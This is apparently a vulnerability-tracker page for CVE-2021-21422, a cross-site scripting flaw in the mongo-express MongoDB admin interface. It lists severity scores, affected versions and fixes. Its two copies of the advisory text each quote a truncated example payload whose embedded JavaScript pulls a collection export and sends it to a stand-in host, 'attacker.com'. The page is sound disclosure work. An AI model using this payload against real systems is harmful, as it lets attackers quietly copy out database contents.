CVE-2021-21422
published 2021-06-21CVE-2021-21422: mongo-express is a web-based MongoDB admin interface, written with Node.js and express. 1: As mentioned in this issue…
PriorityP429medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EPSS
1.57%
72.3th percentile
mongo-express is a web-based MongoDB admin interface, written with Node.js and express. 1: As mentioned in this issue: https://github.com/mongo-express/mongo-express/issues/577, when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. 2: Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use a payload with embedded javascript. This could send an export of a collection to the attacker without even an admin knowing. Other types of attacks such as dropping a database\collection are possible.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mongo-express | mongo-express | < v1.0.0-alpha.4 | v1.0.0-alpha.4 |
| mongo-express_project | mongo-express | <= 0.54.0 | — |
| mongo-express_project | mongo-express | — | — |
| mongo-express_project | mongo-express | >= 0 < 1.0.0-alpha.4 | 1.0.0-alpha.4 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Cross-site scripting
ghsa·2021-06-28
CVE-2021-21422 [HIGH] CWE-79 Cross-site scripting
Cross-site scripting
Two kinds of XSS were found:
1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
### Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
```JSON
{"someField": "long string here to surpass the limit of document ...... await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURICompo
OSV
Cross-site scripting
osv·2021-06-28
CVE-2021-21422 [HIGH] Cross-site scripting
Cross-site scripting
Two kinds of XSS were found:
1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell.
2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc.
### Impact
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
```JSON
{"someField": "long string here to surpass the limit of document ...... await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURICompo
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4bhttps://github.com/mongo-express/mongo-express/issues/577https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3phttps://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4bhttps://github.com/mongo-express/mongo-express/issues/577https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p
2021-06-21
Published